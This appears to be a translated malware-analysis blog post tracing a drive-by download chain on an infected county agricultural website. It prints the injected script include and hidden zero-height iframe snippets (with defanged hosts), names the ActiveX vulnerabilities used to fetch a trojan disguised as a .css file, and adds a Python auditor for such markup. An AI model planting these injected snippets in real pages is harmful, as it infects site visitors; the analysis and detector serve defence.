A county agricultural website infected with Trojan-Downloader.Win32.ACVE.az
Original by endurer
1st-
The home page contains the code:
/---
<SCRIPT src=hxxp://ads***.2*0*-1***0.cn/ad/ad.gif?Id=O></SCRIPT>
---/
#1 hxxp://ads***.2*0*-1***0.cn/ad/ad.gif?Id=O contains the code:
/---
document.writeln("<IFRAME src=hxxp://CC*CAA**ass.cn//11//zz.htm width=100 height=0><//IFRAME>");
---/
#1.1 hxxp://CC*CAA**ass.cn/11/zz.htm contains the code:
/---
<IFRAME src=hxxp://www*.h**ry**spal.cn/llbw/48.htm width=50 height=0 border=0></IFRAME>
---/
#1.1.1 hxxp://www*.h**ry**spal.cn/llbw/41.htm contains the code:
/---
<IFRAME src="hxxp://z*LW**rn*m*8.cn/a14/fxx.htm" width=100 height=0></IFRAME>
---/
#1.1.1.1 hxxp://z*LW**rn*m*8.cn/a14/fxx.htm
References the following pages:
#1.1.1.1.1 hxxp://z*LW**rn*m*8.cn/a14/fx.htm
Checks the browser type. If it is MSIE, it outputs the code:
/---
<IFRAME src=ilink.html width=100 height=0></IFRAME>
---/
Otherwise, it outputs the code:
/---
<IFRAME src=flink.html width=100 height=0></IFRAME>
---/
#1.1.1.1.1.1 hxxp://z*LW**rn*m*8.cn/a14/ilink.html
Checks the Flash Player version and downloads the corresponding files: 5.swf, i45.swf, i16.swf, i28.swf, i47.swf
#1.1.1.1.1.2 hxxp://z*LW**rn*m*8.cn/a14/flink.html
Same as above.
#1.1.1.1.2 hxxp://z*LW**rn*m*8.cn/a14/ss.html
Uses the Snapshot Viewer (snpvw.Snapshot Viewer Control.1) vulnerability to download hxxp://www.*o*Iuy*T*r*.Net/New/a14.css
File Description: D:/test/a14.css
Attribute: ---
Digital Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Size: 23761 bytes, 23.209 KB
MD5: 2025eeb6666507cbbf449bb280e51430
SHA1: cd777b9660719574346098eaf7206d7507b91702
CRC32: 869c5aa2
Subject: Re: a14.css [KLAN-12788462]
Sender: "" <newvirus@kaspersky.com> sent at: 12:46:58
Hello,
a14.css - Trojan-Downloader.Win32.ACVE.az
New malicious software was found in this file. Its detection will be added in the next update. Thank you for your help.
Please quote all when answering.
The answer is relevant to the latest bases from Update sources.
-----------------
Regards, Vitaly Butuzov
Virus analyst, Kaspersky Lab.
#1.1.1.1.3 hxxp://z*LW**rn*m*8.cn/sina.htm
/---
File does not exist
---/
#1.1.1.1.4 hxxp://z*LW**rn*m*8.cn/u.htm
Uses the UUSee (CLSID: 2cacd7bb-1c59-4bbb-8e81-6e83f82c813b) vulnerability.
#1.1.1.1.4.1 hxxp://www.*o*Iuy*T*r*.Net/down/UU.ini
/---
File does not exist
---/
#1.1.1.1.4.2 hxxp://www.uusee.com/mini3/uusee_client_update/remark.php
Kaspersky reports: Trojan-Downloader.JS.Agent.cgt
#1.1.1.1.5 hxxp://z*LW**rn*m*8.cn/a14/thunder.html
Uses the Thunder (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) vulnerability to download hxxp://www.*o*Iuy*T*r*.Net/New/a14.css
#1.1.1.1.6 hxxp://z*LW**rn*m*8.cn/a14/glworld.html
/---
File does not exist
---/
#1.1.1.1.7 hxxp://z*LW**rn*m*8.cn/a14/real.htm
Uses the RealPlayer (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) vulnerability to download hxxp://www.*o*Iuy*T*r*.Net/New/a14.css
#1.1.1.1.8 hxxp://z*LW**rn*m*8.cn/a14/real.html
Same as above.
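
The injection pattern traced above (a script include with a .gif name whose content writes a zero-height iframe, which in turn loads further zero-height iframes) can be flagged by auditing saved page source. This is an added example, not code from the original post; the function names, the sample pages and the example.test hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# document.write()/writeln() with a string-literal argument (simple escapes only)
WRITE_CALL = re.compile(
    r'document\.write(?:ln)?\s*\(\s*(["\'])((?:\\.|(?!\1)[^\\])*)\1', re.I | re.S)
ZERO = re.compile(r'0+(?:px)?$', re.I)
IMAGE_EXT = ('.gif', '.jpg', '.jpeg', '.png', '.bmp')

class TagAudit(HTMLParser):
    """Records iframes drawn with zero size and scripts loaded from image-like paths."""
    def __init__(self, origin):
        super().__init__()
        self.origin, self.findings = origin, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or '').strip() for k, v in attrs}
        src = a.get('src', '')
        if tag == 'iframe':
            zero = [d for d in ('width', 'height') if ZERO.match(a.get(d, ''))]
            if zero:
                self.findings.append((self.origin, tag, src, 'zero ' + '/'.join(zero)))
        elif tag == 'script' and urlparse(src).path.lower().endswith(IMAGE_EXT):
            self.findings.append((self.origin, tag, src, 'script with image extension'))

def audit(source):
    """Return (origin, tag, src, reason) for static markup and document.write output."""
    written = [re.sub(r'\\(.)', r'\1', m.group(2)) for m in WRITE_CALL.finditer(source)]
    fragments = [('static', WRITE_CALL.sub('', source))]  # markup with write calls cut out
    fragments += [('document.write', w) for w in written]
    findings = []
    for origin, fragment in fragments:
        parser = TagAudit(origin)
        parser.feed(fragment)
        parser.close()
        findings += parser.findings
    return findings

# Constructed samples modelled on the chain above; the example.test hosts are placeholders.
HOME_PAGE = ('<html><body><h1>County news</h1>'
             '<script src=http://ads.example.test/ad/ad.gif?id=0></script>'
             '<iframe src="/map.html" width=600 height=400></iframe></body></html>')
AD_GIF = 'document.writeln("<IFRAME src=http://hop1.example.test/11/zz.htm width=100 height=0><\\/IFRAME>");'

if __name__ == '__main__':
    for name, text in (('home page', HOME_PAGE), ('ad.gif', AD_GIF)):
        for finding in audit(text):
            print(name, *finding, sep=' | ')
```

Each reported src is the next page to fetch into an isolated analysis environment and audit in turn, which reproduces the #1, #1.1, #1.1.1 walk by hand.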